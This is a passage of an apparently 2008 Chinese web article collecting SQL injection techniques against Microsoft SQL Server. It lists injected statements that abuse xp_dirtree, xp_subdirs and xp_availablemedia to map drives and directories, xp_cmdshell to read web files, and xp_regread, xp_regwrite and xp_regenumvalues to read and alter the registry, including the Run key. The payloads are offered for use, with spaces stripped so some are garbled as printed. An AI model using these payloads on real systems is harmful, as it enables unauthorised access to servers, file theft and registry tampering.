WEB开发网
开发学院网络安全黑客技术 SQL注入技巧资料大全 阅读

SQL注入技巧资料大全

 2008-10-27 16:51:24 来源:WEB开发网   
核心提示: 12.(1)遍历目录;createtabledirs(pathsvarchar(100),idint);insertdirsexecmaster.dbo.xp_dirtree'c:';and(selecttop1pathsfromdirs)>0;and(selectt

12.(1)遍历目录

;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnot

in('上步得到的paths'))>)

(2)遍历目录

;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:';--获得子目录列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:';--获得所有子目录的目录树结构
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:webindex.asp';--查看文件的内容

13.mssql中的存储过程

xp_regenumvalues注册表根键,子键

;execxp_regenumvalues'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionRun'以多个记录集方式返回所有键值

xp_regread根键,子键,键值名

;execxp_regread'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'CommonFilesDir'返回制定键的值

xp_regwrite根键,子键,值名,值类型,值

值类型有2种REG_SZ表示字符型,REG_DWORD表示整型

;execxp_regwrite'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName','reg_sz','hello'写入注册表

xp_regdeletevalue根键,子键,值名

Tags:SQL 注入 技巧

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接